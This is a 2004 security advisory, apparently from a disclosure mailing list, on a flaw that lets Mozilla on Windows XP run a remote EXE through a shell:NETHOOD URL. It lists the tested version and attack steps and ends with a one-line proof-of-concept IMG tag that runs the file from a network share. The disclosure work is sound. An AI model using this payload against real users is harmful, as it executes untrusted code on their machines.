SUBJ: MOZILLA: SHELL can execute remote EXE program DATE: 2004/07/09 FROM: Liu Die Yu ############################################################ [START] Advisory ############################################################ COPYRIGHT --------- This Advisory is Copyright (c) 2004 "Liu Die Yu". You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. ( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME ) TESTED ------ MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616") running on winxp.en.home.sp1a.up2date.20040709 PROCESS ------- VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p". THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD" AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL: shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED. REFERENCE --------- MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url: http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html greetingz fly to perrymonj. WINDOWS support "shell:NETHOOD": http://does-not-exist.org/mail-archives/bugtraq/msg02171.html thanks to malware for his additional research , and Cheng Peng Su for his original discovery. liudieyu http://umbrella.name ############################################################ [START] PROOF OF CONCEPT ############################################################ [IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]